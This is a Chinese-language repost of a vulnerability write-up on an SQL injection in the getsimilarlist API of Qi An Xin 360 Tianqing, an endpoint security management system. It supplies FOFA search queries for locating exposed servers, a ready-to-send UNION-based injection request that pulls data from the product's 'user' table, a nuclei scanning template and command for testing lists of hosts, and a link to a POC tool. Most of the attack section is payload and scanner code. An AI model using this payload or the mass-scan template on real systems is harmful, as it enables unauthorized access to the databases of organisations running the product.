首页 > 编程入门 文章详情

奇安信360天擎getsimilarlist存在SQL注入漏洞

编程入门 行业动态 更新时间:2024-10-14 14:16:32

奇安信360天擎getsimilarlist存在SQL注入<a href=https://www.elefans.com/category/jswz/34/1770270.html style=漏洞"/>

奇安信360天擎getsimilarlist存在SQL注入漏洞

奇安信360天擎getsimilarlist存在SQL注入漏洞

  • 一、产品描述
  • 二、漏洞描述
  • 三、漏洞复现
    • 1.手动复现
    • 2.自动化复现
      • ①nulei扫描
        • yaml
      • ②小龙POC检测
        • 工具下载地址

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、产品描述

奇安信天擎是奇安信集团旗下一款致力于一体化终端安全解决方案的终端安全管理系统(简称“天擎”)产品。通过“体系化防御、数字化运营”方法,帮助政企客户准确识别、保护和监管终端,并确保这些终端在任何时候都能可信、安全、合规地访问数据和业务 [1] 。 [2] 天擎基于奇安信全新的“川陀”终端安全平台构建,集成高性能病毒查杀、漏洞防护、主动防御引擎,深度融合威胁情报、大数据分析和安全可视化等创新技术,通过系统合规与加固、威胁防御与检测、运维管控与审计、终端数据防泄漏、统一管理与运营等功能,帮助政企客户构建持续有效的终端安全能力。

二、漏洞描述

奇安信360天擎getsimilarlist存在SQL注入漏洞。

三、漏洞复现

fofa: banner=“QiAnXin web server” || banner=“360 web server” || body=“appid”:“skylar6” || body=“/task/index/detail?id={item.id}” || body=“已过期或者未授权,购买请联系4008-136-360”

1.手动复现

POC

GET /api/client/getsimilarlist?status%5B0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281%5D=1&status%5B0%5D=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.667.76 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json

BURP截图

2.自动化复现

①nulei扫描

yaml
id: qianxin-360-tianqing-getsimilarlist-sqli-rceinfo:name: qianxin-360-tianqing-getsimilarlist-sqli-rceauthor: m0be1severity: hightags: qianxin,sqli,iotdescription: 奇安信360天擎getsimilarlist存在SQL注入漏洞metadata: fofa-query: banner="QiAnXin web server" || banner="360 web server"  || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权,购买请联系4008-136-360"verified: truemax-request: 1http:- raw:- |GET /api/client/getsimilarlist?status[0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281]=1&status[0]=1 HTTP/1.1Host:User-Agent: Mozilla/5.0 matchers-condition: andmatchers:- type: statusstatus:- 200- type: wordwords: - "list"- "total"- "reason\":\"success"part: body condition: and- type: wordpart: headerwords: - "application/json"

nuclei.exe -t qianxin-360-tianqing-getsimilarlist-sqli.yaml -l subs.txt -stats

②小龙POC检测

小龙POC检测一通哈拉少

工具下载地址

小龙POC传送门: 小龙POC工具

更多推荐

奇安信360天擎getsimilarlist存在SQL注入漏洞

本文发布于:2023-11-15 20:01:23,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1605473.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:漏洞   奇安信   天擎   SQL   getsimilarlist

发布评论

评论列表 (有 0 条评论)

最近发表

草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!

热门文章

标签列表